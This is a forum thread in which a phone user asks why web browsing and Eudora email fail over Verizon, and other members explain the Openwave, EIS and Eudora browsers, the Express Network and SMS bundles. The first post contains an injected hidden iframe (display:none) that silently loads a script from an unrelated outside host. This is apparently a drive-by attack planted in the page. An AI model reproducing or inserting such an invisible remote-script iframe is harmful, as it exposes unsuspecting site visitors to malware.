+ Reply to Thread

internet/ and eudora usage problem

I have been trying to access the web and use the eudora program wirelessly for a day now without success. I do subscribe to the msn internet through verizon. Do I need the express network to use these other functions??<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I get sigining on...... then

errorPP timeout (0x1231)

Have you checked your network settings against those in alanb's Verizon QNC data FAQ ? Make sure that your settings match the ones in the FAQ, and then see if it still doesn't work.
    Please visit my picture site: Robert-O-Rama :)

Robert,

Thanks for the info. I did all the steps, it did not work. I will call verizon however I had one question. It appears to me that there are 2 different browsers the EIS and the openware. On my previous phone I was using the openware for the msn internet through verizon which enabled me to use SMS as well. Are these 2 different browsers, I am very confused as I am a novice to all this. If I call verizon and activate the express network, and remove the msn verizon internet, will I still be able to send SMS and access the web through the phone?? I am not interested in connecting it to a laptop. I would like to obtain my email from my optonline acct as well as browse the web and send text messages. Thanks in advance for your advice.

Marc

EIS and Eudora web are HTML browser like you have on a home PC.

The Openwave browser is a WAP browser as found on regular wireless phones.

i currently subscribe to mobile web whivh uses the openware browser. If I use edura/eis I assume that it is a better browser and email program. Can I do everything that I was doing with mobile web with the other browser?? Is it better to go with the express network??

1stCare--

I personally wouldn't waste the money on Express Network unless you do a lot of browsing on the net.

My recommendation would be to drop the mobile web service and just use the eudora browser. You can buy SMS bundles for your text messages.

Access to QNC is free and you should be able to access most sites with the eudora browser. My experience has not been good with the EIS browser as it takes longer to download each page because it displays graphics. Eudora is fast and concise.

If you follow alanb's FAQ you should be all set.